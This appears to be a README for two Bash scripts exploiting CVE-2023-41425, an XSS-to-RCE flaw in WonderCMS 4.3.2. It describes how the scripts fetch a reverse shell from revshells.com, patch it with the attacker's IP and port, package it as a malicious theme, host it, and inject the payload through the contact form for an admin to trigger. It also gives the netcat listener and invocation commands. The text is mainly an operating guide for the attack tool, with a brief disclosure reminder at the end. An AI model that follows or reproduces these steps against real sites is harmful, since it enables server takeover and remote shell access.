These scripts exploit an XSS (Cross-Site Scripting) vulnerability in WonderCMS 4.3.2 to achieve Remote Code Execution (RCE). The XSS payload, when triggered by the admin, automatically installs a reverse shell on the target server by leveraging a crafted malicious theme module. The reverse shell is obtained from revshells.com and executed, granting the attacker remote access to the server.
To successfully run either script, the following tools and conditions are required:
- Bash Shell: Both scripts are written for Linux environments using the Bash shell.
- netcat (nc): Used to listen for the reverse shell connection.
- Python3: A simple Python HTTP server is used to host the XSS payload.
- WonderCMS 4.3.2: The target must be running a vulnerable version of WonderCMS.
- Administrator Interaction: The payload requires an admin to trigger the XSS, which results in the reverse shell execution.
- revshells.com: The reverse shell payload is downloaded dynamically from revshells.com.
Automatic version (AUTO_CVE-2023-41425): this version of the exploit automatically checks for an active nc listener, downloads the reverse shell, starts the HTTP server, sends the payload, and waits for the admin to trigger the reverse shell.
- Automatic Reverse Shell Setup: Downloads a pre-generated reverse shell from revshells.com.
- XSS Payload Injection: Injects an XSS payload in the target's contact form.
- HTTP Server Management: Automatically starts a Python HTTP server to host the reverse shell payload.
- nc Listener Check: Ensures the listener is running before proceeding.
- Payload Auto-send: Sends the payload automatically without user interaction.
- Ensure the nc listener is running on the specified port: nc -nvlp <PORT>
- Run the script with the following command:
Example:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
- Download Reverse Shell: The script downloads the reverse shell from revshells.com.
- Modify the Reverse Shell: The reverse shell script is updated with the attacker's IP and port.
- Create ZIP Payload: A ZIP file containing the reverse shell is created.
- Craft XSS Payload: An XSS payload that installs the reverse shell is generated and injected into the vulnerable contact form.
- Auto-Start HTTP Server: The script starts a Python HTTP server to serve the malicious payload.
- Auto-Send Payload: The XSS payload is sent to the admin automatically.
Use the exploit link provided by the script in the Website field...
Manual version (CVE-2023-41425): this version requires the user to manually manage the nc listener and the triggering of the XSS payload. It is better suited to scenarios where automatic processes are not desirable.
- Manual Reverse Shell Setup: The user is responsible for ensuring the listener is running.
- Manual XSS Triggering: The script provides the malicious link to be sent to the admin, but the payload must be triggered manually.
- HTTP Server Management: Starts a Python HTTP server to host the XSS payload.
- Ensure the nc listener is running on the specified port: nc -nvlp <PORT>
- Run the script with the following command:
Example:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
- Download Reverse Shell: Downloads a reverse shell from revshells.com.
- Modify the Reverse Shell: Updates the reverse shell with the attacker's IP and port.
- Create ZIP Payload: Creates a ZIP file containing the reverse shell.
- Craft XSS Payload: Generates an XSS payload that installs the reverse shell.
- Display Malicious Link: Displays the link that needs to be sent to the admin for triggering.
- Start HTTP Server: Starts a Python HTTP server to host the payload.
- Admin Interaction: Both exploits rely on the WonderCMS admin triggering the XSS payload by visiting the vulnerable page. Once triggered, the reverse shell is established with the attacker's machine.
- Firewall/IDS/IPS: Be cautious when running these exploits on environments protected by firewalls or Intrusion Detection Systems (IDS) that might block or alert on suspicious activity.
- Responsible Disclosure: If you find that a target is vulnerable, always follow ethical guidelines and report the vulnerability to the appropriate parties.